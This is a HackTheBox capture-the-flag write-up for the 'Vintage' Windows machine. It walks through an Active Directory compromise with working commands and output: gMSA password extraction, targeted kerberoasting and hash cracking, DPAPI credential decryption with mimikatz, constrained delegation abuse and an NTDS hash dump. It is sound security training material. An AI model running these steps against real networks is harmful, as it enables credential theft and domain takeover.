# HTB - Vintage

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FpGbnT0d7gy2foNyFAyMt%2Fimage.png?alt=media&#x26;token=804708ed-b1a4-48dd-8d03-70c58ac56d38" alt=""><figcaption></figcaption></figure>

## Enumeration

***

> As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  unknown
49681/tcp open  unknown
49689/tcp open  unknown
49708/tcp open  unknown

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV 10.129.124.148 -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Active Directory LDAP (Domain: vintage.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Active Directory LDAP (Domain: vintage.htb)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

**Summary**

```r
* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* Services: DNS - KERBEROS - RPC - LDAP - LDAPS - SMB - winRM
* Important notes: Domain: vintage.htb
```

**hosts file**

Update the hosts file to avoid encountering any issues when authenticating to the domain

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $sudo sh -c "echo  '10.129.124.148 dc01 vintage.htb dc01.vintage.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $tail -n1 /etc/hosts
10.129.124.148 dc01 vintage.htb dc01.vintage.htb
```

**DNS Enumeration**

Zone transfer failed

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip dc01.vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 dc01.vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
```

**RPC & SMB Enumeration**

Every time I connect to `rpc` With invalid credentials, it gives me `Access_denied` But this weird error message is unique this time:

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip -c enumdomusers
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED
```

The same thing with `SMB` using `netexec`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FiSXtboy7JWskLcUeoVp5%2FPasted%20image%2020241130211804.png?alt=media&#x26;token=7ecdc24b-8fdd-4917-bbab-20ae45909e70" alt=""><figcaption></figcaption></figure>

**Kerberos & LDAP Enumeration**

`NT_STATUS_NOT_SUPPORTED` flag means `NTLM` authentication is disabled, so I have to use `kerberos` authentication instead.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k  --admin-count

LDAP        dc01   389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Administrator
LDAP        dc01            389    dc01.vintage.htb Administrators
LDAP        dc01            389    dc01.vintage.htb Print Operators
LDAP        dc01            389    dc01.vintage.htb Backup Operators
LDAP        dc01            389    dc01.vintage.htb Replicator
LDAP        dc01            389    dc01.vintage.htb L.Bianchi_adm
```

I will note `L.Bianchi_adm` The user is a high-value target in my notes, then continue enumerating.

Getting all users in the domain and their description field

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FnXYLhs8Jz33G7fDgYYrM%2FPasted%20image%2020241130214750.png?alt=media&#x26;token=5b4887e2-d3f2-44dc-a522-c9394cf1ba88" alt=""><figcaption></figcaption></figure>

Checking for `PKI`, `LDAP signing` and `Machine Account Qouta`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k -M adcs -M ldap-checker -M maq

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
ADCS        dc01            389    dc01.vintage.htb [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

LDAP-CHE... dc01            389    dc01.vintage.htb [-] [Errno -2] Name or service not known
LDAP-CHE... dc01            389    dc01.vintage.htb LDAP Signing NOT Enforced!

MAQ         dc01            389    dc01.vintage.htb [*] Getting the MachineAccountQuota
MAQ         dc01            389    dc01.vintage.htb MachineAccountQuota: 0
```

Password Reuse failed

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u users.list -p Rosaisbest123 -d vintage.htb -k --continue-on-success
LDAP        dc01            389    dc01.vintage.htb [*]  x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ark:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ldap:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_sql:Rosaisbest123 KDC_ERR_CLIENT_REVOKED
LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\G.Viola:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\R.Verdi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\M.Rossi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
```

## Foothold

***

With a domain user credential, I can use `bloodhound.py` and dump ldap data for further enumeration, then ingesting the zip file into `bloodhoud CE`

`` `FS01` `` is a member of `PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FQeYNnN50jfSUVJhaWfk2%2FPasted%20image%2020241201161854.png?alt=media&#x26;token=7e8c8c26-d49b-432c-a65e-43b7b04696cc" alt=""><figcaption></figcaption></figure>

Attack Explain ([Pre-Windows 2000 computers | The Hacker Recipes](https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers))\
Reference: [TrustedSec | Diving into Pre-Created Computer Accounts](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts)

> From the post, computer assigned with `pre-windows 2000` attribute has the password of its lowercase name

Confirming it with `netexec`

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap 10.129.232.23 -u 'fs01$' -p fs01 -k

LDAP   10.129.232.23   389    dc01.vintage.htb [+] vintage.htb\fs01$:fs01 
```

With `fs01$` computer account, I can extract `GMSA` secret hash due to `ReadGMSAPassword` privilege

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FveQ1xGCRkGHhao6dWyTk%2FPasted%20image%2020241130221424.png?alt=media&#x26;token=fc34b8c4-ae67-4640-b4a7-5bd00bd71e3e" alt=""><figcaption></figcaption></figure>

\
First, get a Kerberos ticket for `fs01$` and then provide it to `KRB5CCNAME` variable to extract the `GMSA` secrets with `bloodyAD`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit 'fs01$'
Password for fs01$@VINTAGE.HTB: fs01

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 09:23:42  12/01/2024 19:23:42  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 09:23:40

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7axxxxxxxxxxxxxxx
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==
```

Get a Kerberos ticket for `GMSA01$` the account.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in gmsa01$@dc01.ccache
```

`GMSA01$` can add itself or any user to `Service Managers` group, so I will add `P.Rosa` to that group because I have his password and it's easy to move when you have a password :))&#x20;

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FgEc9q2BGhfsNK0hbKw1o%2FPasted%20image%2020241130221450.png?alt=media&#x26;token=c049ed2e-1b7d-433c-8145-8eb07ac8e15b" alt=""><figcaption></figcaption></figure>

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa

[+] P.Rosa added to CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB
```

Membership in `service managers` Group grants me the ability to change the password of three service users or assign a fake SPN to them

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F5NsI3hjAehPkJj4MzsBM%2FPasted%20image%2020241130215052.png?alt=media&#x26;token=eada984c-5409-422d-93e7-bdf5320bb8b2" alt=""><figcaption></figcaption></figure>

Trying to perform `targetkerberos` against `svc_sql` account and enable it because I can't request `Service Ticket (ST)` for disabled accounts

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FOq30ioUP5Qzc6LBXAl3l%2FPasted%20image%2020241201172130.png?alt=media&#x26;token=5b374fac-81a9-46f4-bb49-3f6682ddd759" alt=""><figcaption></figcaption></figure>

Using `PowerView.py` I can enable the account, then assign a SPN for it

```bash
(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set serviceprincipalname='service/dc01.vintage.htb'

[2024-12-01 10:13:49] [Set-DomainObject] Success! modified attribute serviceprincipalname for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb

(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set userAccountControl=512             

[2024-12-01 10:18:27] [Set-DomainObject] Success! modified attribute useraccountcontrol for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
```

Perform a kerberoasting attack

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u p.rosa -p Rosaisbest123 -k --kerberoasting kerberos.hash

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\p.rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Bypassing disabled account krbtgt 
LDAP        dc01            389    dc01.vintage.htb [*] Total of records returned 1
LDAP        dc01            389    dc01.vintage.htb sAMAccountName: svc_sql memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb pwdLastSet: 2024-12-01 10:12:04.583550 lastLogon:<never>
LDAP        dc01            389    dc01.vintage.htb $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$blob...
```

Crack the hash

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$5c8b7f808a8cf1a4eb8cdc495b8f71b9$13310d68a29e5f44f74d55c066d19a6d3f187906b54c866fd860784de403813e9a8772ec270e8734b4d89d04dc51a4e569c92beac67729b043471fe387c8659a945e9893e3ebafe0b97e6e8ee912354186321c1029a5b9aca893aa5a6e2197493250e38b1ef7a0cc554b70dc16da09d29207172e7ef3715a41c5f36ce3d5bc6801a5ff7a382c0217e43c2f8daaf84e742e17a..snip..5:Zerxxxxxxx

Session..........: hashcat
Status...........: Cracked
```

Spraying the password reveals that `C.Neri` has the same one

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FOJREFGqiqW8WgZ9IBtxD%2FPasted%20image%2020250412001453.png?alt=media&#x26;token=9f788bc8-17d9-4156-8dc6-40f1c6ea74b0" alt=""><figcaption></figcaption></figure>

Since `C.Neri` is in `Remote Management Users`I will access the machine with `evil-winrm` but first get `kerberos` ticket for him.

> To perform kerberos authentication from Linux, you must configure `/etc/krb5.conf` first

```conf
[libdefaults]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB
```

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit C.Neri
Password for C.Neri@VINTAGE.HTB: 

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: C.Neri@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 10:27:07  12/01/2024 20:27:07  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 10:27:02
```

Access the machine via `winRM` using Kerberos authentication

```powershell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx
```

> User Flag: 35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx

## Lateral Movement

***

Inside `C.Neri` folder, there are DPAPI-encrypted credentials

> DPAPI stands for Data Protected API which is Microsoft encryption mechanism. It can be decrypted by the user's password who encrypt it and his masterkey

* Normal Location of DPAPI:
  * `%USERPROFILE%\AppData\Roaming\Microsoft\Credentials`
  * `%USERPROFILE%\AppData\LOCAL\Microsoft\Credentials`
* The master key Location:
  * `%USERPROFILE%\AppData\Roaming\Microsoft\Protect\SID\`

```bash
JokerShell C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -Force

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6
```

We can either encode this encrypted credential by base64 encoding, then transfer to our windows VM along with the master keys to decrypt it locally.

After doing so, we can use `mimikatz.exe` with `dpapi::masterkey` first to get the master key, then with `dpapi::cred` to extract the credential with the obtained master key.

```powershell
dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

[masterkey] with password: Zerxxxxxxx (protected user)
  key : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
  sha1: 637b40612daf4b1bd99785833479898aeb6d9739

dpapi::cred /in:C:\Users\Dark_Man\Downloads\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f

Decrypting Credential:
 * masterkey     : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000da - 218
  credUnk0       : 00000000 - 0

  Type           : 00000001 - 1 - generic
  Flags          : 00000000 - 0
  LastWritten    : 6/7/2024 3:08:23 PM
  unkFlagsOrSize : 00000030 - 48
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : LegacyGeneric:target=admin_acc
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : vintage\c.neri_adm
  CredentialBlob : Uncr4ckxxxxxxxxxxxd0312
  Attributes     : 0
```

## Privilege Escalation

***

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FR9ecT02WCWMsbdVRpJgG%2FPasted%20image%2020241130215240.png?alt=media&#x26;token=12a62b52-58e9-416f-8bcc-3daa5a4f7062" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FPQwgCg58Sl23JDnbAh48%2FPasted%20image%2020241201182841.png?alt=media&#x26;token=7eb20523-8afa-4671-82cd-4744d95619ef" alt=""><figcaption></figcaption></figure>

* Attack Explain:
  1. With `GenericWrite` on `DELEGATEDADMINS`, I can add any user to this group
  2. With `DELEGATEDADMINS` privileges, I can perform `Constrained Delegation` and request a ticket for `CIFS`
  3. With this ticket, I can dump `NTDS.DIT` database with `secretdump.py`

> This is a script running on the box resetting any change made by players, So I will put the steps we did before here to make things fast.

Adding `P.Rosa` to `SERVICEMANAGERS` groups (Previous Step)

```bash
KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa
```

Set SPN to `svc_sql` With proper syntax `Service/FQDN` and enable the account if it's disabled again

```bash
Set-DomainObject -Identity svc_sql -Set userAccountControl=512 
Set-DomainObject -Identity svc_sql -Set serviceprincipalname='MSSQLSvc/dc01.vintage.htb'
OR
KRB5CCNAME=`pwd`/p.rosa.ccache bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k set object 'SVC_SQL' servicePrincipalName -v 'MSSQLSvc/dc01.vintage.htb'
```

Abuse `GenericWrite`privileges

```bash
KRB5CCNAME=`pwd`/c.neri_adm.ccache bloodyAD -k --host dc01.vintage.htb --dc-ip dc01 -d 'VINTAGE.HTB' add groupMember 'DELEGATEDADMINS' 'svc_sql'
```

Perform `Constrained Delegation` attack

```bash
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/svc_sql':'Zerxxxxxxx' -k
```

Export the ticket to `KRB5CCNAME` and dump `ntds` using `netexec`

> Note: I will use `L.BIANCHI_ADM` DA user instead of normal Administrator user.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -d vintage.htb -k --use-kcache --ntds --user L.BIANCHI_ADM                                          
SMB      dc01    445    dc01     [+] vintage.htb\dc01$ from ccache
SMB      dc01    445    dc01             L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:8e83e02f54e85de52xxxxxxxxxxxx4:::

impacket-getTGT vintage.htb/l.bianchi_adm@dc01 -hashes :8e83e02f54e85dexxxxxxxxxxxxx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -k --use-kcache -d vintage.htb

SMB   dc01    445    dc01     [+] vintage.htb\l.bianchi_adm from ccache (Pwn3d!)
```

```powershell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a35039cb0106fdd70bcxxxxxxxxxxxxxx
```

> Root Flag: a35039cb0106fdd70bcxxxxxxxxxxxxxx